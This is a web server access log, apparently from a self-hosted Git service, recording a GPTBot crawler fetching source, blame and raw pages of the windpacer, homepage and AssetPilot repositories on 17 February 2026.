AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" -[17/Feb/2026:14:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" -[17/Feb/2026:14:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 805881] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" -[17/Feb/2026:14:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14230] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15576] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13680] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" -[17/Feb/2026:14:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" -[17/Feb/2026:14:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 12527] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:14:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" -[17/Feb/2026:14:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" -[17/Feb/2026:14:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" -[17/Feb/2026:14:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" -[17/Feb/2026:14:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" -[17/Feb/2026:14:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" -[17/Feb/2026:14:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" -[17/Feb/2026:14:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" -[17/Feb/2026:14:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" -[17/Feb/2026:14:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14686] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:14:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10202] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" -[17/Feb/2026:14:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14985] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15932] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14687] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:14:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:14:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16942] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" -[17/Feb/2026:14:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15930] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16943] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15931] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14588] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14586] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14588] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10202] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" -[17/Feb/2026:14:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13610] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:14:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 10823] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:14:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17039] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17005] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13130] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12325] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 